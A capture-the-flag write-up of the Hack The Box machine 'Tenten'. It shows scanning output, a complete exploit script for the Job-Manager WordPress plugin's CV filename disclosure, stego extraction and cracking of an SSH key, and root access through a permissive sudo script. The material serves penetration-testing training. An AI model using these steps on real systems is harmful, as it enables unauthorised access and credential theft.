Overview
This machines starts off with some enumeration and identification of a WordPress plugin vulnerability allowing indirect object reference after some exploit modification. This leads us to a hidden rsa key, which we recover with steghide and ssh2john leading us to gain user access. From here we take advantage of a sudo assigned permissions to escalate to administrator.
Skills Required
ssh2john
wp scanning
exploit modification
Tools Used
ssh2john
john
wp scan
burp suite
Intruder
Lessons Learned
Take your time reading exploits
Recon
A basic nmap scan gets us started with a few discovered ports. From here we dive deeper with nmap.
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-07 19:06 GMT
Nmap scan report for 10.10.10.10
Host is up (0.21s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -sT -sC -sV -vv 10.10.10.10
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD0ZxDYLkSx3+n8qOc+tpjAd+KZ8STcHdayXH5Vn7gRhiI6toUP53yvS4ysmU4uq/QkX+oAJabm3H2WdVDySKvLVitCstPErNjKmi3Zr4ROlJVyv25eR0Wuo42PqDRCB0DN5SBZsoylDM1FN53ZTdiTC4Da4NM/3zfXzJgBpo8NdRyCZJnTufOdR8x4RE/0QU6UZR1cJPKKNmS/7qzHtMDZx5MM0li07d77mDpUoMCxPGCWlH5VsgpKBUSvdzd5xjilN5/tU/uwgL4FLTcMJF6DPDORYxJWjGO8ThSm8nf+kgxdv1iSF3olv++tReoWjVZy/xrEIdgHTcPjGggldR9v
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERpTI9NMPamS6NaoLL5Y/nq+T19q1KR6GgtbsnmjCTtnGBKlaGI46uCPIYZwQ0MFDRg1hxq13rhLxl7JPIEjWU=
| 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIOrtl+D1cRlO2WrvblMacn5J5/rh+PTJmgxDwkBBfg7
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Here we learn that wordpress is running on the target host, and this is going to be the next investigation point as WP can be riddled with vulnerabilities, whether its through an outdated application or vulnerable addons/extensions.
Wordpress
Linux has a built in tool for Wordpress enumeration. The tool is called with "wpscan" and outputs adequate amounts of information. Looking into the module reveals its reliance on the highhly effective rapid 7 scanning tools.
wpscan --url 10.10.10.10
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.4
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.10/ [10.10.10.10]
[+] Started: Sun Mar 7 19:13:12 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.10/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.10/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.10/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.10/index.php/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
| - http://10.10.10.10/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.3</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
| Last Updated: 2020-12-09T00:00:00.000Z
| Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] job-manager
| Location: http://10.10.10.10/wp-content/plugins/job-manager/
| Latest Version: 0.7.25 (up to date)
| Last Updated: 2015-08-25T22:44:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.2.5 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <==========================> (22 / 22) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Sun Mar 7 19:13:34 2021
[+] Requests Done: 70
[+] Cached Requests: 5
[+] Data Sent: 14.002 KB
[+] Data Received: 16.384 MB
[+] Memory used: 204.77 MB
[+] Elapsed time: 00:00:22
There are several points worth reviewing and they are highlighted above in blue. For starters we see that wp-cron is externally enabled, allowing an attacker to mass call the cron-job and dos the hosts CPU. Fun fact, this was my first ever bug bounty. This is not going to be relevant to completing this machine however.
The next vulnerability is insecure disclosure of potentially sensitive information. Investigating the comments and feed directory shows nothing is present. Following this is the twenty seventeen plugin that appears to be out of date, however a little research shows that there are no known vulnerabilities.
Finally we come to the job manager, and a little research shows that we have a vulnerable version with a publicly available exploit. CVE 2016-6668 that allows for reading of remote files. Or in this case, resumes or CV's. More information is available in the link below.
Initially running this exploit did not work, and I felt like I was missing part of the picture for this exploit to run. So I decided some further research on the exploit and target were required.
HTTPs
Browsing to the website we learn it is a job listing portal.
Initially the website showed nothing, but upon clicking the search button with a blank entry a Pen Tester Job Listing appeared.
This revealed the specific position, and I obviously clicked apply now.
URL Fuzzing
Initially I thought the CV upload could lead to a file upload vulnerability, but there appeared to be some basic filtering in place. From here I noticed the URL had a parameter ID.
I started rotating through the numbers and observed different pages. This process was really slow however, and I wanted to capture the data of 30 pages without going through them manually. After some research it dawned on me, I could use burpsuite intruder to perform URL fuzzing. From here I fired up burp suite and intercepted the request to URL:
As intruder iterated through numbers 1-20 I was able to quickly view the response pages. Page 13 showed the job application HackerAccessGranted. It took me a little bit, but eventually I determined this could be an existing shell. You can see in the image below.
HTTP/1.1 200 OK
Date: Sun, 07 Mar 2021 20:12:22 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 57713
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en-US" class="no-js no-svg">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script>
<title>Job Application: HackerAccessGranted – Job Portal</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link href='https://fonts.gstatic.com' crossorigin rel='preconnect' />
<link rel="alternate" type="application/rss+xml" title="Job Portal » Feed" href="http://10.10.10.10/index.php/feed/" />
<link rel="alternate" type="application/rss+xml" title="Job Portal » Comments Feed" href="http://10.10.10.10/index.php/comments/feed/" />
<script type="text/javascript">
From here I thought to run the nmap nse script "malware" that checks for possible backdoors, by enumerating ports and existing services. However nothing was found.
CVE2015-6668
From here I back peddled to cve2015-6668 which grants the ability to read cv files in the Word Press Job Manager. Given that we found a hackeraccessgranted title, this could be the name of an associated file. But to find out we will have to fuzz for some extensions.
I was able to utilize the existing exploit for cve2015-6668 and after some modifications to the script, I realized I was making it worse, and the default script worked fine. I had made a costly error on my part, in not understanding the url parameters I needed to pass through. The exploit is listed below.
import requests
print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')
filename2 = filename.replace(" ", "-")
for year in range(2017,2019):
for i in range(1,13):
for extension in {'jpeg','png','jpg'}:
URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
req = requests.get(URL)
if req.status_code==200:
print "[+] URL of CV found! " + URL
The exploit is simply enumerating the year and month to determine the cv's exact file location.
Running the exploit in the below image shows they are successful in identifying the ability to read cv files on the website with the specified date.
└──╼ $python exploit.py
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Browsing to the URL gives us nothing but a picture.
Forensics
With the picture downloaded, some simple forensics will reveal our next couple steps.
Running binwalk showed nothing. Accessing some quick steganography tools was the next course of action, given this machine was rated as being "CTF Like". The first and foremost tool was steghide a common stegonography tool for concealing or revealing data in images. Running steghide with the info command revealed a hidden file.
└──╼ $steghide info HackerAccessGranted.jpg
"HackerAccessGranted.jpg":
format: jpeg
capacity: 15.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "id_rsa":
size: 1.7 KB
encrypted: rijndael-128, cbc
compressed: yes
┌─[user@parrot-virtual]─[~/htb/tenten]
└──╼ $
From here we see there is an id_rsa key which can possibly be used to gain remote access to the target. We want to copy that rsa key and determine the accompanying password. To do this we grab the key with steghide extract -sf HackerAccessGranted.jpg.
From here I attempted to use my handy application Johnny, which is a GUI version on John the ripper but it could not open due to errors that looked too bothersome to fix. So I called ssh2john instead, which is able to extract the password hash obfuscated behind the ssh key. This is performed by identifying the symmetric encryption algorithm and replaying it backwards over the rsa key.
From here we receive the hash and are able to run John the ripper for the password.
└──╼ $john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:12 DONE (2021-03-07 21:05) 0.08169g/s 1171Kp/s 1171Kc/s 1171KC/sa6_123..*7¡Vamos!
We have a hit and find our password highlighted in blue above.
Gaining User Flag
Armed with the SSH key, and the accompanying password we can attempt a login. I remember seeing the user Takis on the WordPress websites under the posts, so he will be the goto user.
ssh -i id_rsa takis@10.10.10.10 we obtain a successful connection and the user flag.
└──╼ $ssh -i id_rsa takis@10.10.10.10
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
65 packages can be updated.
39 updates are security updates.
Last login: Fri May 5 23:05:36 2017
takis@tenten:~$ ls
user.txt
takis@tenten:~$ cat user.txt
e5c7ed3b8##############c8686f31
takis@tenten:~$
Root
This is a classic privilege's escalation technique, only found on a few HTB machines. They are typically more indepth and require exploit medication or reverse engineering. But none the less we check for the classic sudo permissions.
takis@tenten:/home$ sudo -l
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
takis@tenten:/home$
This was identified as a shell script so I called it as if it were a shell.
takis@tenten:/home$ file /bin/fuckin
/bin/fuckin: Bourne-Again shell script, ASCII text executable
Boom we get the flag.
Just keep in mind it is only this simple as this is one of the early medium ranked machines. The root flags are not this simple even on the easiest machines.
takis@tenten:/home$ sudo /bin/fuckin sh
# whoami
root
# cat root.txt
f9f7291################ 425c3e08f603
Comments